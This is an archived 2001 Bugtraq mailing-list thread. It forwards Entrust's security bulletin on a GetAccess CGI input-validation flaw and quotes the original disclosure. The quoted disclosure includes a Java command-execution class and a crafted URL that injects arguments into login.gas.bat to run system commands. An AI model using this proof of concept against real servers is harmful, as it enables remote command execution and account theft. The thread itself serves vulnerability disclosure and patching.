FW: Entrust - getAccess

From: MARTAK,PAVEL (HP-Czechia,ex1) (pavel_martakat_private)
Date: Wed Aug 01 2001 - 00:04:10 PDT

Next message: Michal Zalewski: "Re: [RAZOR] Linux kernel IP masquerading vulnerability (_actual_ patch)"

Previous message: Heikki Korpela: "Re: New command execution vulnerability in myPhpAdmin"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

I did not see  Entrust answer  posted to bugtraq so I'm sending it.
Pavel M.
-----Original Message-----
From: GetAccess Support [mailto:getaccess.supportat_private]
Sent: 30. července 2001 16:37
To: 'MARTAK,PAVEL (HP-Czechia,ex1)'
Subject: RE: Entrust - getAccess


Good morning Pavel. 
I've included the press release and patch details below. Please let me know
if you need clarification. 
Sincerely, 
Jeff 
Entrust Security Bulletin  E01-001 
================================== 
Subject: Entrust GetAccess(tm) CGI Script Vulnerability 
Originally posted: July 27, 2001 
Summary 
======= 
An internet newsgroup posting on BUGTRAQ has identified a vulnerability in
Entrust GetAccess that could allow unauthorized execution of Java programs
installed on GetAccess web servers. This vulnerability has been confirmed by
Entrust and a patch is forthcoming. 
Detailed information on this issue has been posted to the Entrust customer
extranet on both the Entrust GetAccess Portal
(https://login.encommerce.com/private/docs/techSupport/Patches-BugFix/e01-00
1.html) and the Entrust Customer Support Extranet
(https://www.entrust.com/support/resources/recentsecuritynotes.htm).
If you have trouble reaching the portals, please call: within North America
877-754-7878, elsewhere 613-270-3700.  A hotline has been established for
the weekend of July 28th/29th, at +1 613 220 8357.
Affected Software Versions 
========================== 
 - Entrust GetAccess, all versions and platforms 
 - Specifically, servers running the Access Service, administration
application, or runtimes. 
Patch Availability 
================== 
Patches for this vulnerability will be posted to the Entrust customer
support extranet on or before Sunday, July 29th 2001.
================== 
(c) Entrust Inc. 2001 
Jeff McGrath 
Web Security Team 
getAccess Integration 
Entrust, Inc. 
"Securing the Internet" 
Customer Support Phone: 1 877 PKI SUPT 
mailto:supportat_private 
http://www.entrust.com 



-----Original Message----- 
From: MARTAK,PAVEL (HP-Czechia,ex1) [mailto:pavel_martakat_private] 
Sent: Monday, July 30, 2001 2:51 AM 
To: supportat_private 
Subject: FW: Entrust - getAccess 


This was announced in BUGTRAQ. 
PavelM 
-----Original Message----- 
From: rudi carell [mailto:rudicarellat_private] 
Sent: 27. července 2001 13:34 
To: BUGTRAQat_private 
Subject: Entrust - getAccess 



hola friends, 
getAccess[tm] is used as a single-sign-on system often used for large 
internet-portals. 
--- snip (http://www.entrust.com) --- 
Entrust GetAccess[tm] offers the most comprehensive solution for 
consistently deploying and enforcing 
basic and enhanced security across online applications, from Web browsers, 
to enterprise applications and 
legacy database systems. 
--- snip --- 
problem description: 
due to missing input-validation it is possible to run(start) java-programs 
on the "getaccess"-machine. 
combined with public accessibly uploads or any other possibility to create 
class-files on the server this vulnerability c 
ould be used to run arbitrary system commands on the target machine( or 
change getAccess parameters and steal any user ac 
count you want BTW). 
it should also be possible(but not proven yet) to exploit default-,install- 
or demo classes within Java or getAccess whic 
h would make the file-upload(creation) part unneeded! 
(uninstall.class is very likely an effective DOS) 


Example: 
find exploitable getAccess-class(one which accepts params!) or upload a 
"command" programm: 
--- cut here (example cmd.java) --- 
import java.io.*; 
public class cmd { 
public static void main(String args[]) { 
s = null; 
try { 
Process p = Runtime.getRuntime().exec(args[0]+" "+args[1]); 
BufferedReader stdInput = new BufferedReader(new 
InputStreamReader(p.getInputStream())); 
BufferedReader stdError = new BufferedReader(new 
InputStreamReader(p.getErrorStream())); 
System.out.println("Content-type: text/html\n\n"); 
while ((s = stdInput.readLine()) != null) { System.out.println(s); } 
while ((s = stdError.readLine()) != null) { System.out.println(s); } 
System.exit(0); 
} 
catch (IOException e) { e.printStackTrace(); System.exit(-1); } 
} } 
--- cut here --- 


later then .. a http-request to : 
http://hostname/sek-bin/login.gas.bat/x%20-classpath%20/whereever%20cmd%20/b

in/ls%20-alsi 
.. will run "/whereever/cmd.class" and execute "/bin/ls -alsi" 


Summary: 
object: *.gas.bat  (all the getAccess cgi-shell-scripts) 
class: input validation 
remote: yes 
vendor: has been informed with a separate e-mail ( entrustat_private ) 


(and BTW. i would NEVER EVER recommand to use shell-scripts for 
authentication purposes!) 


nice day, 


rC 
rudicarellat_private 
securityat_private 
http://www.freefly.com/security/ 








_________________________________________________________________ 
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp

Next message: Michal Zalewski: "Re: [RAZOR] Linux kernel IP masquerading vulnerability (_actual_ patch)"
Previous message: Heikki Korpela: "Re: New command execution vulnerability in myPhpAdmin"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Aug 01 2001 - 07:59:50 PDT